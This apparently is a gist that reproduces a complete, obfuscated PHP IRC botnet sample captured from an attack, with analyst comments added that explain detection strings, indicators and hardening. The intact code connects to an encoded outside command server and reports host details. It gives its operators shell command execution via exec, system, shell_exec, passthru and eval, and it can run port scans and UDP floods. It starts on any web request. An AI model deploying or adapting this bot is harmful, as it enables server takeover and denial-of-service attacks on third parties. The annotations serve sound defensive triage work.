Last active
December 30, 2019 05:33
sparkfun attack 12-27-13
<?php set_time_limit(0); error_reporting(0); class FZjJrBjJJZfjFnzFf { | |
// ANALYST ANNOTATION (defensive triage). This listing is a malicious sample as published on
// the page: an IRC-controlled bot with randomised identifiers. Only comments were added; the
// code is left exactly as captured. The line above removes the PHP execution time limit and
// turns error reporting off before the class is declared, so the script can run indefinitely
// without emitting warnings.
//
// Strings that are stable in this sample and useful for content matching: "UdpFlood Gestart!",
// "UdpFlood Afgerond!", "gerestart door", "die command from", and the IRC verbs built by the
// send helpers (NICK / USER / PASS / JOIN / PRIVMSG / NOTICE).
//
// Configuration array, described by how each key is used further down:
//   JFJBfVJnRRzvbZzJ  encoded server host; passed through decrypt() with key_a before fsockopen().
//                     The commenter on the page reads the decoded value as burrito.wut.re.
//   zvvF              port handed to fsockopen() ("8080").
//   nVnBV             value sent in the IRC PASS line when non-empty.
//   zjnNFn            number of random characters in the generated nickname.
//   HhLxP             channel that is joined and that receives all PRIVMSG/NOTICE output.
//   vBf               second argument of JOIN (channel key).
//   FzvzFJrrj         MD5 value compared with md5() of the argument of the "user" command.
//   NrVzbznZJJ        prefix character that marks a message as a command.
//   rzZvbbnfbjf       MD5 value compared with md5() of the sender's host part; "*" skips that check.
var $BvNfVZJNBNjVNvz = array("JFJBfVJnRRzvbZzJ"=>"dXdkZ31kej5geHk7e30=", | |
"zvvF"=>"8080", | |
"nVnBV"=>"scary", | |
"zjnNFn"=>"13", | |
"HhLxP"=>"#ngrz", | |
"vBf"=>"scan", | |
"FzvzFJrrj"=>"bf4b3ba0692b4378406f3df1df1e326a", | |
"NrVzbznZJJ"=>".", | |
"rzZvbbnfbjf"=>"90c83c5174ae2098c64393e576a10048"); | |
// Set of senders that passed the "user" check, keyed by the full message prefix.
var $zRFfVVnrfzzjBRBVBr = array(); | |
// Only key_a is referenced in the visible code (in the connect routine); key_b and key_c
// are not used anywhere in this listing.
var $key = array("key_a"=>"WbvUtpu0WMM5i8mMDzlP5Thyy","key_b"=>"gL5Ax7nyt7SIrIv3kqbiDNM2Z","key_c"=>"rXJzm7FY26lZjKigsRx1drbut"); | |
// Builds a random nickname of config['zjnNFn'] characters from the charset below and sends
// it as an IRC NICK line. Called at connect, on numeric 433 and by the "rndnick" command.
// $umA is appended to without being initialised; error_reporting(0) hides the notice.
function UQiEeyUmuAIqYuyu() { | |
$HpdTpD = '[abcdefghijklm)nopqrstuvwxyz_ABCDEFGHIJKLM(NOPQRSTUVWXYZ-0123456789]'; | |
$tHXhLLT = strlen($HpdTpD); | |
for($T=0;$T<$this->BvNfVZJNBNjVNvz['zjnNFn'];$T++) { | |
$umA .= $HpdTpD[rand(0,$tHXhLLT-1)]; | |
} | |
$this->QUqueMM("NICK ".$umA.""); | |
} | |
// Sends an IRC NOTICE with text $tLx to target $Xx.
function uIQyaqIqMy($Xx,$tLx) | |
{ | |
$this->QUqueMM("NOTICE $Xx :$tLx"); | |
} | |
// Returns 1 when $lhPH (a message prefix) is in the authenticated set, otherwise 0.
function QymAyMmuEAQM($lhPH) | |
{ | |
if(isset($this->zRFfVVnrfzzjBRBVBr[$lhPH])) | |
return 1; | |
else | |
return 0; | |
} | |
// Handler behind the "udpflood" command: $lhPH is the destination, $pDHttXtPdT the payload
// size in bytes, $mQeQ the duration in seconds. It announces start and end in the channel
// (Dutch: "Gestart" = started, "Afgerond" = finished, "verzonden / gemiddelde" = sent /
// average) and reports the volume in MB.
// Detection note: on the wire this appears as the web server's PHP process opening many
// short-lived UDP sockets to one destination on random ports in 0-6000, every datagram
// carrying the same payload. Egress filtering of UDP from web hosts blocks it.
function qAaQuQMYYauqaQemYa($lhPH,$pDHttXtPdT,$mQeQ) { | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002UdpFlood Gestart!\002]"); | |
$PTPtdPLXp = ""; | |
for($T=0;$T<$pDHttXtPdT;$T++) { $PTPtdPLXp .= chr(mt_rand(1,256)); } | |
$ThpHp = time(); | |
$T = 0; | |
while(time()-$ThpHp < $mQeQ) { | |
$Np=fsockopen("udp://".$lhPH,mt_rand(0,6000),$e,$s,5); | |
fwrite($Np,$PTPtdPLXp); | |
fclose($Np); | |
$T++; | |
} | |
$zGP = $T * $pDHttXtPdT; | |
$zGP = $zGP / 1048576; | |
$hVC = $zGP / $mQeQ; | |
$hVC = round($hVC); | |
$zGP = round($zGP); | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002UdpFlood Afgerond!\002]: $zGP MB verzonden / gemiddelde: $hVC MB/s "); | |
} | |
// Sends an IRC PRIVMSG with text $tLx to target $Xx; every command result goes through here.
function mUMAIemiuqi($Xx,$tLx) | |
{ | |
$this->QUqueMM("PRIVMSG $Xx :$tLx"); | |
} | |
// Sends an IRC JOIN for channel $HhLxP with optional key $vBf.
function QaEUaI($HhLxP,$vBf=NULL) | |
{ | |
$this->QUqueMM("JOIN $HhLxP $vBf"); | |
} | |
// Adds $lhPH (a message prefix) to the authenticated set.
function eaiAYmuqM($lhPH) | |
{ | |
$this->zRFfVVnrfzzjBRBVBr[$lhPH] = true; | |
} | |
// Main loop: reads lines of up to 512 bytes from the server socket until EOF, keeps the
// session alive, and dispatches operator commands. When the socket reaches EOF the method
// calls the connect routine again, so the process does not end on disconnect.
function MMeIaQyAaAAQmu() | |
{ | |
while(!feof($this->wwgGsCWsk)) | |
{ | |
$this->auuyy = trim(fgets($this->wwgGsCWsk,512)); | |
$bnfznjJFbrRVj = explode(" ",$this->auuyy); | |
// Keep-alive: answer a server PING with the matching PONG.
if(substr($this->auuyy,0,6)=="PING :") | |
{ | |
$this->QUqueMM("PONG :".substr($this->auuyy,6)); | |
} | |
// Numeric 004: join the configured channel (sent twice, once raw and once through the
// helper) and post the host report built by eImyUaqEeYMaUaaYUyM().
if(isset($bnfznjJFbrRVj[1]) && $bnfznjJFbrRVj[1] =="004") | |
{ | |
$this->QUqueMM("JOIN ".$this->BvNfVZJNBNjVNvz['HhLxP']." ".$this->BvNfVZJNBNjVNvz['vBf'].""); | |
$this->QaEUaI($this->BvNfVZJNBNjVNvz['HhLxP'],$this->BvNfVZJNBNjVNvz['vBf']); | |
$this->eImyUaqEeYMaUaaYUyM(); | |
} | |
// Numeric 433: pick a new random nickname.
if(isset($bnfznjJFbrRVj[1]) && $bnfznjJFbrRVj[1]=="433") | |
{ | |
$this->UQiEeyUmuAIqYuyu(); | |
} | |
// Skip a line identical to the previous one ($FnF_PPl is set at the end of each pass).
if($this->auuyy != $FnF_PPl) | |
{ | |
$RvJbVrNjRjfVNv = array(); | |
// $oKs: message text after " :"; $KCgs: that text split into words.
$oKs = substr(strstr($this->auuyy," :"),2); | |
$KCgs = explode(" ",$oKs); | |
// Split the prefix (first token) at "!" and "@": $WkSCsk ends up as the part after "@"
// (the sender's host), $SoCkc as the nickname, $sgcwGck as the whole prefix.
$SoCkc = explode("!",$bnfznjJFbrRVj[0]); | |
$WkSCsk = explode("@",$SoCkc[1]); | |
$WkSCsk = $WkSCsk[1]; | |
$SoCkc = substr($SoCkc[0],1); | |
$sgcwGck = $bnfznjJFbrRVj[0]; | |
// NOTE(review): $this->SoCkc is not assigned anywhere in the visible code, so this
// comparison is against an unset property; the else branch copies the words unchanged.
if($KCgs[0]==$this->SoCkc) | |
{ | |
for($T=0;$T<count($KCgs);$T++) | |
$RvJbVrNjRjfVNv[$T] = $KCgs[$T+1]; | |
} | |
else | |
{ | |
for($T=0;$T<count($KCgs);$T++) | |
$RvJbVrNjRjfVNv[$T] = $KCgs[$T]; | |
} | |
if(count($bnfznjJFbrRVj)>2) | |
{ | |
switch($bnfznjJFbrRVj[1]) | |
{ | |
// QUIT / PART from an authenticated sender drops that sender from the set.
case "QUIT": | |
if($this->QymAyMmuEAQM($sgcwGck)) | |
{ | |
$this->QUMaQayu($sgcwGck); | |
} | |
break; | |
case "PART": | |
if($this->QymAyMmuEAQM($sgcwGck)) | |
{ | |
$this->QUMaQayu($sgcwGck); | |
} | |
break; | |
case "PRIVMSG": | |
// Login path: sender not yet authenticated and md5(host) equals the configured value
// (or that value is "*"). The only command accepted here is "user" with a password
// whose MD5 equals config['FzvzFJrrj']; otherwise a NOTICE goes to the channel
// (Dutch: "Fout password" = wrong password).
if(!$this->QymAyMmuEAQM($sgcwGck) && (md5($WkSCsk) == $this->BvNfVZJNBNjVNvz['rzZvbbnfbjf'] || $this->BvNfVZJNBNjVNvz['rzZvbbnfbjf'] == "*")) | |
{ | |
if(substr($RvJbVrNjRjfVNv[0],0,1)==$this->BvNfVZJNBNjVNvz['NrVzbznZJJ']) | |
{ | |
switch(substr($RvJbVrNjRjfVNv[0],1)) | |
{ | |
case "user": | |
if(md5($RvJbVrNjRjfVNv[1])==$this->BvNfVZJNBNjVNvz['FzvzFJrrj']) | |
{ | |
$this->eaiAYmuqM($sgcwGck); | |
} | |
else | |
{ | |
$this->uIQyaqIqMy($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002Auth\002]: Fout password $SoCkc idioot!!"); | |
} | |
break; | |
} | |
} | |
} | |
// Command path for an authenticated sender. The first word must start with the
// configured prefix; the rest of that word selects the handler.
// Hardening note: exec, shell_exec, system and passthru can be switched off with the
// php.ini disable_functions directive; eval is a language construct and is not
// covered by that directive.
elseif($this->QymAyMmuEAQM($sgcwGck)) | |
{ | |
if(substr($RvJbVrNjRjfVNv[0],0,1)==$this->BvNfVZJNBNjVNvz['NrVzbznZJJ']) | |
{ | |
switch(substr($RvJbVrNjRjfVNv[0],1)) | |
{ | |
// "exec": passes the remainder of the message to exec() and relays each non-empty
// line of the returned value to the channel.
case "exec": | |
$CowSSSGkwgkG = substr(strstr($oKs,$RvJbVrNjRjfVNv[0]),strlen($RvJbVrNjRjfVNv[0])+1); | |
$kWkGgkwkcGkck = exec($CowSSSGkwgkG); | |
$oWkOSwOKWgCokk = explode("\n",$kWkGgkwkcGkck); | |
for($T=0;$T<count($oWkOSwOKWgCokk);$T++) | |
if($oWkOSwOKWgCokk[$T]!=NULL) | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP']," : ".trim($oWkOSwOKWgCokk[$T])); | |
break; | |
// "sexec": same relay, using shell_exec().
case "sexec": | |
$CowSSSGkwgkG = substr(strstr($oKs,$RvJbVrNjRjfVNv[0]),strlen($RvJbVrNjRjfVNv[0])+1); | |
$kWkGgkwkcGkck = shell_exec($CowSSSGkwgkG); | |
$oWkOSwOKWgCokk = explode("\n",$kWkGgkwkcGkck); | |
for($T=0;$T<count($oWkOSwOKWgCokk);$T++) | |
if($oWkOSwOKWgCokk[$T]!=NULL) | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP']," : ".trim($oWkOSwOKWgCokk[$T])); | |
break; | |
// "eval": hands operator-supplied text to eval(); the result is stored in a local
// and not sent back.
case "eval": | |
$eval = eval(substr(strstr($oKs,$RvJbVrNjRjfVNv[1]),strlen($RvJbVrNjRjfVNv[1]))); | |
break; | |
// "system": same relay, using system().
case "system": | |
$CowSSSGkwgkG = substr(strstr($oKs,$RvJbVrNjRjfVNv[0]),strlen($RvJbVrNjRjfVNv[0])+1); | |
$kWkGgkwkcGkck = system($CowSSSGkwgkG); | |
$oWkOSwOKWgCokk = explode("\n",$kWkGgkwkcGkck); | |
for($T=0;$T<count($oWkOSwOKWgCokk);$T++) | |
if($oWkOSwOKWgCokk[$T]!=NULL) | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP']," : ".trim($oWkOSwOKWgCokk[$T])); | |
break; | |
// "dns": a dotted value with four numeric parts goes to gethostbyaddr(), anything
// else to gethostbyname(); the answer is posted to the channel.
case "dns": | |
if(isset($RvJbVrNjRjfVNv[1])) | |
{ | |
$Os = explode(".",$RvJbVrNjRjfVNv[1]); | |
if(count($Os)==4 && is_numeric($Os[0]) && is_numeric($Os[1]) && is_numeric($Os[2]) && is_numeric($Os[3])) | |
{ | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002dns\002]: ".$RvJbVrNjRjfVNv[1]." => ".gethostbyaddr($RvJbVrNjRjfVNv[1])); | |
} | |
else | |
{ | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002dns\002]: ".$RvJbVrNjRjfVNv[1]." => ".gethostbyname($RvJbVrNjRjfVNv[1])); | |
} | |
} | |
break; | |
// "logout": removes the sender from the authenticated set and confirms in the
// channel (Dutch: "Je bent nu uitgelogt" = you are now logged out).
case "logout": | |
$this->QUMaQayu($sgcwGck); | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002Auth\002]\00314 Je bent nu uitgelogt $SoCkc"); | |
break; | |
// "rndnick": new random nickname.
case "rndnick": | |
$this->UQiEeyUmuAIqYuyu(); | |
break; | |
// "info": re-sends the host report.
case "info": | |
$this->eImyUaqEeYMaUaaYUyM(); | |
break; | |
// "raw": writes the rest of the message to the server socket as an IRC line.
case "raw": | |
$this->QUqueMM(strstr($oKs,$RvJbVrNjRjfVNv[1])); | |
break; | |
// "restart": sends QUIT, closes the socket and reconnects.
case "restart": | |
$this->QUqueMM("QUIT :gerestart door $SoCkc"); | |
fclose($this->wwgGsCWsk); | |
$this->QmQIYIUuumeYu(); | |
break; | |
// "die": sends QUIT, closes the socket and ends the PHP process.
case "die": | |
$this->QUqueMM("QUIT :die command from $SoCkc"); | |
fclose($this->wwgGsCWsk); | |
exit; | |
// "passthru": same relay, using passthru().
case "passthru": | |
$CowSSSGkwgkG = substr(strstr($oKs,$RvJbVrNjRjfVNv[0]),strlen($RvJbVrNjRjfVNv[0])+1); | |
$kWkGgkwkcGkck = passthru($CowSSSGkwgkG); | |
$oWkOSwOKWgCokk = explode("\n",$kWkGgkwkcGkck); | |
for($T=0;$T<count($oWkOSwOKWgCokk);$T++) | |
if($oWkOSwOKWgCokk[$T]!=NULL) | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP']," : ".trim($oWkOSwOKWgCokk[$T])); | |
break; | |
// "pscan": one fsockopen() attempt to the given host and port with a 15-second
// timeout, reported to the channel as open or closed.
case "pscan": | |
if(count($RvJbVrNjRjfVNv) > 2) | |
{ | |
if(fsockopen($RvJbVrNjRjfVNv[1],$RvJbVrNjRjfVNv[2],$e,$s,15)) | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002pscan\002]: ".$RvJbVrNjRjfVNv[1].":".$RvJbVrNjRjfVNv[2]." is \2open\2"); | |
else | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"[\002pscan\002]: ".$RvJbVrNjRjfVNv[1].":".$RvJbVrNjRjfVNv[2]." is \2closed\2"); | |
} | |
break; | |
// "udpflood": needs three arguments and forwards them to qAaQuQMYYauqaQemYa().
case "udpflood": | |
if(count($RvJbVrNjRjfVNv)>3) | |
{ | |
$this->qAaQuQMYYauqaQemYa($RvJbVrNjRjfVNv[1],$RvJbVrNjRjfVNv[2],$RvJbVrNjRjfVNv[3]); | |
} | |
break; | |
} | |
} | |
} | |
break; | |
} | |
} | |
} | |
$FnF_PPl = $this->auuyy; | |
} | |
// Socket hit EOF: connect again.
$this->QmQIYIUuumeYu(); | |
} | |
// Writes one line, terminated with CRLF, to the server socket.
function QUqueMM($tLx) | |
{ | |
fwrite($this->wwgGsCWsk,"$tLx\r\n"); | |
} | |
// Sends the IRC USER line: a random six-character ident with the suffix "-go", and the
// php_uname() string (or "---" when empty) as the real-name field, which discloses the
// host's OS details to the server at registration.
function QMeuUiMqMmqMaeeYY() { | |
$HpdTpD = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'; | |
$tHXhLLT = strlen($HpdTpD); | |
for($T=0;$T<6;$T++) { | |
$umA .= $HpdTpD[rand(0,$tHXhLLT-1)]; | |
} | |
if(php_uname() == "") { $dHDdDxPL = "---"; } else { $dHDdDxPL = php_uname(); } | |
$this->QUqueMM("USER ".$umA."-go 127.0.0.1 localhost :".$dHDdDxPL.""); | |
} | |
// Connect routine: opens a socket to the decoded host on config['zvvF'] with a 30-second
// timeout, calls itself again when the connection fails, then sends USER, PASS (when
// configured) and NICK and enters the main loop.
// Detection note: a web-server PHP process holding a long-lived outbound connection to
// port 8080 and speaking IRC is the network-level indicator for this sample.
function QmQIYIUuumeYu() | |
{ | |
if(!($this->wwgGsCWsk = fsockopen(decrypt($this->BvNfVZJNBNjVNvz['JFJBfVJnRRzvbZzJ'],$this->key['key_a']),$this->BvNfVZJNBNjVNvz['zvvF'],$e,$s,30))) | |
$this->QmQIYIUuumeYu(); | |
$this->QMeuUiMqMmqMaeeYY(); | |
if(strlen($this->BvNfVZJNBNjVNvz['nVnBV'])>0) | |
$this->QUqueMM("PASS ".$this->BvNfVZJNBNjVNvz['nVnBV']); | |
$this->UQiEeyUmuAIqYuyu(); | |
$this->MMeIaQyAaAAQmu(); | |
} | |
// Removes $lhPH (a message prefix) from the authenticated set.
function QUMaQayu($lhPH) | |
{ | |
unset($this->zRFfVVnrfzzjBRBVBr[$lhPH]); | |
} | |
// Host report posted to the channel after joining and on the "info" command: safe_mode
// state, the URL built from $_SERVER['SERVER_NAME'] and $_SERVER['REQUEST_URI'], the
// current working directory with its permission bits rendered as an ls-style string, and
// php_uname(). \002 and \003 are IRC formatting control codes (bold, colour).
// Triage note: the reported URL is the request that invoked the script, so web access
// logs for that path help date the first execution.
function eImyUaqEeYMaUaaYUyM() { | |
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $dxdxdThxhxD = "\0034ON\003"; } else { $dxdxdThxhxD = "\0039OFF\003"; } | |
$dHDdDxPL = php_uname(); | |
if($dHDdDxPL == "") { $nVWKPl = "\00315---\003"; } else { $nVWKPl = "\00315".$dHDdDxPL."\003"; } | |
$Nfgw = "\00315http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\003"; | |
$hXOOO = getcwd().""; | |
$hscO = "\00315".$hXOOO."\003"; | |
$WsGsgKcSKO = fileperms("$hXOOO"); | |
// File-type character from the high mode bits.
if (($WsGsgKcSKO & 0xC000) == 0xC000) { $WOwwCosOckk = 's'; | |
} elseif (($WsGsgKcSKO & 0xA000) == 0xA000) { $WOwwCosOckk = 'l'; | |
} elseif (($WsGsgKcSKO & 0x8000) == 0x8000) { $WOwwCosOckk = '-'; | |
} elseif (($WsGsgKcSKO & 0x6000) == 0x6000) { $WOwwCosOckk = 'b'; | |
} elseif (($WsGsgKcSKO & 0x4000) == 0x4000) { $WOwwCosOckk = 'd'; | |
} elseif (($WsGsgKcSKO & 0x2000) == 0x2000) { $WOwwCosOckk = 'c'; | |
} elseif (($WsGsgKcSKO & 0x1000) == 0x1000) { $WOwwCosOckk = 'p'; | |
} else { $WOwwCosOckk = 'u'; } | |
// Owner, group and other permission triplets, including setuid/setgid/sticky markers.
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0100) ? 'r' : '-'); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0080) ? 'w' : '-'); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0040) ? (($WsGsgKcSKO & 0x0800) ? 's' : 'x' ) : (($WsGsgKcSKO & 0x0800) ? 'S' : '-')); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0020) ? 'r' : '-'); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0010) ? 'w' : '-'); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0008) ? (($WsGsgKcSKO & 0x0400) ? 's' : 'x' ) : (($WsGsgKcSKO & 0x0400) ? 'S' : '-')); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0004) ? 'r' : '-'); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0002) ? 'w' : '-'); | |
$WOwwCosOckk .= (($WsGsgKcSKO & 0x0001) ? (($WsGsgKcSKO & 0x0200) ? 't' : 'x' ) : (($WsGsgKcSKO & 0x0200) ? 'T' : '-')); | |
$jflP = "\00315".$WOwwCosOckk."\003"; | |
$this->mUMAIemiuqi($this->BvNfVZJNBNjVNvz['HhLxP'],"\00314[SAFE:\003\002 $dxdxdThxhxD\002\00314]\00315 $Nfgw \00314[pwd:]\00315 $hscO \00314(\003$jflP\00314) [uname:]\00315 $nVWKPl"); | |
} | |
} | |
// ANALYST ANNOTATION: string de-obfuscation helper, used in this sample to hide the server
// host name from plain-text searches of the file.
//   - An empty $key returns $text unchanged.
//   - Otherwise $text is base64-decoded, spaces are stripped from $key, the script exits
//     with 'key error' when the key is shorter than 8 characters, and the key is cut to at
//     most 32 characters and repeated to the length of the text.
//   - Each byte keeps its top three bits (mask 0xe0) and has its low five bits (mask 0x1f)
//     XORed with the key byte at the same position.
// Because only an XOR mask is applied after the base64 step, an analyst can recover the
// configured value offline from the encoded string and key_a without running the sample.
function decrypt($text, $key = '') { | |
if ($key == '') { return $text; } $text = base64_decode($text); | |
$key = str_replace(' ', '', $key); if (strlen($key) < 8) { exit('key error'); } | |
$key_len = strlen($key); if ($key_len > 32) { $key_len = 32; } | |
$key = substr($key, 0, $key_len); $text_len = strlen($text); | |
$lomask = str_repeat("\x1f", $text_len); $himask = str_repeat("\xe0", $text_len); | |
$k = str_pad("", $text_len, $key); $text = (($text ^ $k) & $lomask) | ($text & $himask); | |
return $text; | |
} | |
// ANALYST ANNOTATION: entry point. Merely requesting or including this file creates the
// bot object and starts the connect routine, so any web-reachable copy runs on request.
$GskCscoG = new FZjJrBjJJZfjFnzFf; | |
$GskCscoG->QmQIYIUuumeYu(); ?> |
i think this is trying to connect to burrito.wut.re port 8080